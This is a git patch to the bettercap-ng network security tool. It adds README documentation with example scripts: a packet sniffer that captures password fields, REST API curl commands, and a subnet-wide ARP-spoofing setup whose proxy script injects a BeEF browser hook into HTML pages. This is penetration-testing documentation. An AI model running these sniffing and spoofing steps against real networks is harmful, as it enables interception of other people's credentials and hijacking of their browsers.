From fe5f422aa6f6baaf62e446dd8a98ecf5dce6abcc Mon Sep 17 00:00:00 2001 From: evilsocket Date: Mon, 8 Jan 2018 10:57:33 +0100 Subject: [PATCH] docs: readme update --- README.md | 112 +++++++++++++++++++++++++++++++++++++++++++++++- core/options.go | 2 +- 2 files changed, 111 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 2cbdc7eb..5af14bc1 100644 --- a/README.md +++ b/README.md @@ -24,9 +24,117 @@ Make sure you have a correctly configured Go >= 1.8 environment and the `libpcap To show the command line options: - sudo ./bettercap-ng -h + # sudo ./bettercap-ng -h + + Usage of ./bettercap-ng: + -caplet string + Read commands from this file and execute them in the interactive session. + -debug + Print debug messages. + -eval string + Run a command, used to set variables via command line. + -iface string + Network interface to bind to. + -no-history + Disable history file. + -silent + Suppress all logs which are not errors. -To have an idea of what commands you can use once `bettercap-ng` is started, take a look at the `caplets` scripts folder, each of those commands can be either manually entered during the interactive session, or scripted and loaded from `.cap` files. +## Caplets + +Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more. + +#### caplets/simple-password-sniffer.cap + +Simple password sniffer. + +```sh +# keep reading arp table for network mapping +net.recon on +# setup a regular expression for packet payloads +set net.sniffer.regexp .*password=.+ +# set the sniffer output file +set net.sniffer.output passwords.pcap +# start the sniffer +net.sniffer on +``` + +#### caplets/rest-api.cap + +Start a rest API. + +```sh +# change these! +set api.rest.username bcap +set api.rest.password bcap +# set api.rest.port 8082 + +# actively probe network for new hosts +net.probe on +net.recon on + +# enjoy /api/session and /api/events +api.rest on +``` + +Get information about the current session: + + curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session + +Execute a command in the current interactive session: + + curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}' + +Get last 50 events: + + curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50 + +Clear events: + + curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events + +#### caplets/beef-inject.cap + +Use a proxy script to inject a BEEF javascript hook: + +```sh +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64" + +# inject beef hook +set http.proxy.script caplets/beef-inject.js +# keep reading arp table for network mapping +net.recon on +# redirect http traffic to a proxy +http.proxy on +# wait for everything to start properly +sleep 1 +# make sure probing is off as it conflicts with arp spoofing +arp.spoof on +``` + +The `caplets/beef.inject.js` proxy script file: + +```javascript +function onLoad() { + console.log( "BeefInject loaded." ); + console.log("targets: " + env['arp.spoof.targets']); +} + +function onResponse(req, res) { + if( res.ContentType.indexOf('text/html') == 0 ){ + var body = res.ReadBody(); + if( body.indexOf('') != -1 ) { + res.Body = body.replace( + '', + '' + ); + res.Updated(); + } + } +} +``` ## License diff --git a/core/options.go b/core/options.go index bfbd7a40..d1bf3f0d 100644 --- a/core/options.go +++ b/core/options.go @@ -14,7 +14,7 @@ type Options struct { func ParseOptions() (Options, error) { o := Options{ InterfaceName: flag.String("iface", "", "Network interface to bind to."), - Caplet: flag.String("caplet", "", "Read commands from this file instead of goin into interactive mode."), + Caplet: flag.String("caplet", "", "Read commands from this file and execute them in the interactive session."), Debug: flag.Bool("debug", false, "Print debug messages."), Silent: flag.Bool("silent", false, "Suppress all logs which are not errors."), NoHistory: flag.Bool("no-history", false, "Disable history file."),